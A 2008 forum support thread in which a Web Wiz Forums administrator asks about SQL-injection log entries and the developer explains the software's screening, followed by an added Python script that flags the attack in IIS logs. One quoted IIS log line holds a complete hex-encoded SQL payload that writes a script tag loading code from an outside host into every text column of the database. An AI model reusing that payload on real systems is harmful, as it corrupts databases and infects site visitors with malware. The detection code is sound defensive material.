SqlInjectionTest

Nick-V
Senior Member


Joined: 26 October 2002
Location: United Kingdom
    Posted: 30 August 2008 at 11:30am
I've just installed 9.51 with all logging enabled. I note the following:
 
2008-08-29 18:00:05 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
 
  1. I really welcome additional security but would like to know what is happening here? A guest cannot post so cannot inject? What is this test telling me?
  2. Why are we seeing an internal IP address 192.168.xxx.xxx?

Nick-V
Senior Member


Joined: 26 October 2002
Location: United Kingdom
Posted: 30 August 2008 at 12:14pm
I am checking the forum log and the IIS log to try and determine exactly what is happening with some SQL injections and have provided info below that may be useful. My questions:
 
1) Does printer_friendly_posts.asp (and others) need to be protected...there was an attempt in the IIS log but nothing in the forum log?
 
2) Why do the two apparent attacks in the IIS log from 196.44.128.221 have an IP address in the forum log of 192.168.1.196?
 
4 x SQL forum log entries (printer_friendly_posts.asp is missing)
2008-08-29 17:57:07 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_Server_SqlInjectionTest() -  -
2008-08-29 18:00:05 - 192.168.1.196 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
2008-08-29 19:06:51 - 189.20.218.142 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
2008-08-29 23:06:27 - 200.96.213.185 - Guest - ERROR - File: functions_common.asp - Error Details: err_SQLServer_SqlInjectionTest() -  -
5 x IIS log entries
2008-08-29 16:57:08 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0x4445434C415245204054205641524348415228323535292C404320564152434841522832353529204445434C415245205461626C655F437572736F7220435552534F5220464F522053454C45435420612E6E616D652C622E6E616D652046524F4D207379736F626A6563747320612C737973636F6C756D6E73206220574845524520612E69643D622E696420414E4420612E78747970653D27752720414E442028622E78747970653D3939204F5220622E78747970653D3335204F5220622E78747970653D323331204F5220622E78747970653D31363729204F50454E205461626C655F437572736F72204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C4043205748494C4528404046455443485F5354415455533D302920424547494E20455845432827555044415445205B272B40542B275D20534554205B272B40432B275D3D525452494D28434F4E5645525428564152434841522834303030292C5B272B40432B275D29292B27273C736372697074207372633D687474703A2F2F7777772E637632652E72752F7363726970742E6A733E3C2F7363726970743E27272729204645544348204E4558542046524F4D205461626C655F437572736F7220494E544F2040542C404320454E4420434C4F5345205461626C655F437572736F72204445414C4C4F43415445205461626C655F437572736F7220%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 196.44.128.221 HTTP/1.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.xxx.com 200 0 0 890 1628 359
 
2008-08-29 17:00:05 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST([payload removed]%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 196.44.128.221 HTTP/1.0 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.xxx.com 200 0 0 890 1628 359
 
2008-08-29 17:57:30 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/printer_friendly_posts.asp TID=8163;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST([payload removed]%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 67.233.178.228 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.xxx.com 302 0 0 799 1456 234
 
2008-08-29 18:06:52 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST([payload removed]%20AS%20VARCHAR(4000));EXEC(@S);-- 80 - 189.20.218.142 HTTP/1.1 Mozilla/4.0+(compatible;+MSIE+7.0;+Windows+NT+5.1;+.NET+CLR+2.0.50727) - - www.xxx.com 200 0 0 890 1445 578
 
2008-08-29 22:06:26 W3SVC741317 BPMFS01 xxx.xxx.xxx.xxx GET /forum/forum_posts.asp TID=7409;DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST([payload removed]

WebWiz-Bruce
Admin Group
Web Wiz Developer

Joined: 03 September 2001
Location: Bournemouth
Posted: 31 August 2008 at 8:36am
The SQL Injection test has been put in place mainly to reduce the impact of the current SQL Injection viruses, which are very common at present.

Web Wiz Forums is already protected against SQL Injection. Any input used within an SQL Query is screened and any SQL removed. However, attacks by these viruses do NOT cause security issues in Web Wiz Forums thanks to the screening, but the page will still load as normal, using up bandwidth and server resources.

This test is run right at the beginning and just returns an error message, thus reducing your bandwidth consumption and server load when these viruses attack.

On some busy forums we have seen as many as 40 attempts per second by these viruses attempting to inject malicious SQL into the forum, so having this extra precaution is useful for these forums to reduce the amount of resources consumed unnecessarily by these virus attacks.

The IIS log file entries that you have included at the end of your post are from computers infected with an SQL Injection virus that attempted to inject malicious SQL into your forum.

To determine which pages are best protected and in what way, we have studied the log files of a number of large forums that come under regular attack from these viruses. The printer_friendly_posts.asp page does have this extra protection, so make sure you have updated it to the latest release.

IP addresses may be different in IIS log files to Web Wiz Forums, as IIS stores the IP of proxy servers, which can mean the IP is not always correct. Web Wiz Forums, being written in ASP, has to rely on the IP address contained in the HTTP header, which may be altered to give an incorrect IP address.


Edited by WebWiz-Bruce - 31 August 2008 at 10:57am
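
An added example (not part of the thread and not Web Wiz code): Python that flags the stacked DECLARE/CAST/EXEC query string in IIS log lines and pairs each hit with the forum log entry written at the same moment. It assumes the IIS log is in UTC and the forum log in UK local time (UTC+1 in August), which would explain why the quoted entries sit one hour apart; the reduced log layout, the 0xAA placeholder and the function names are constructed for illustration.

```python
import re
from datetime import datetime, timedelta
from urllib.parse import unquote

# Constructed sample: the four complete IIS entries quoted in the thread, cut down
# to "date time method path query client-ip status" with the hex payload replaced
# by 0xAA, plus one benign request (last line, documentation IP) for contrast.
Q = "DECLARE%20@S%20VARCHAR(4000);SET%20@S=CAST(0xAA%20AS%20VARCHAR(4000));EXEC(@S);--"
IIS_LOG = f"""\
2008-08-29 16:57:08 GET /forum/forum_posts.asp TID=7409;{Q} 196.44.128.221 200
2008-08-29 17:00:05 GET /forum/forum_posts.asp TID=7409;{Q} 196.44.128.221 200
2008-08-29 17:57:30 GET /forum/printer_friendly_posts.asp TID=8163;{Q} 67.233.178.228 302
2008-08-29 18:06:52 GET /forum/forum_posts.asp TID=7409;{Q} 189.20.218.142 200
2008-08-29 18:10:00 GET /forum/forum_posts.asp TID=7409 198.51.100.7 200
"""
# Forum log timestamps and IPs as quoted in the thread (other fields dropped).
FORUM_LOG = """\
2008-08-29 17:57:07 - 192.168.1.196
2008-08-29 18:00:05 - 192.168.1.196
2008-08-29 19:06:51 - 189.20.218.142
2008-08-29 23:06:27 - 200.96.213.185
"""
# Stacked statement that builds a string from a hex literal and executes it.
SIGNATURE = re.compile(
    r";\s*DECLARE\s+@\w+.*CAST\(\s*0x[0-9a-f]+\s+AS\s+N?VARCHAR.*EXEC\s*\(\s*@\w+", re.I)
FMT = "%Y-%m-%d %H:%M:%S"

def flag_injections(iis_text):
    """Return IIS entries whose URL-decoded query string matches SIGNATURE."""
    hits = []
    for line in iis_text.splitlines():
        date, time, _method, path, query, ip, status = line.split()
        if SIGNATURE.search(unquote(query)):
            hits.append({"utc": datetime.strptime(f"{date} {time}", FMT),
                         "path": path, "ip": ip, "status": int(status)})
    return hits

def correlate(hits, forum_text, offset=timedelta(hours=1), slack=timedelta(seconds=2)):
    """Pair each hit with the forum-log IP logged within `slack` of utc + offset."""
    forum = [(datetime.strptime(s, FMT), ip)
             for s, ip in (l.split(" - ") for l in forum_text.splitlines())]
    pairs = []
    for hit in hits:
        want = hit["utc"] + offset
        match = next((ip for t, ip in forum if abs(t - want) <= slack), None)
        pairs.append((hit["path"], hit["ip"], match))
    return pairs

if __name__ == "__main__":
    print(*correlate(flag_injections(IIS_LOG), FORUM_LOG), sep="\n")
```

Under that time-zone assumption, both requests from 196.44.128.221 line up with the forum entries logged as 192.168.1.196, and the printer_friendly_posts.asp request that IIS answered with 302 has no forum log counterpart.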

Nick-V
Senior Member


Joined: 26 October 2002
Location: United Kingdom
Posted: 31 August 2008 at 11:16am
Thanks for all the useful explanations about this new feature...
 
I replaced ALL files when I set up this version but I'll check the version of printer_friendly_posts.asp again - more likely the error predates the upgrade!
 
EDIT: I definitely have the correct version installed and the log timestamps show that everything was in place...I will monitor this.


Edited by Nick-V - 31 August 2008 at 11:32am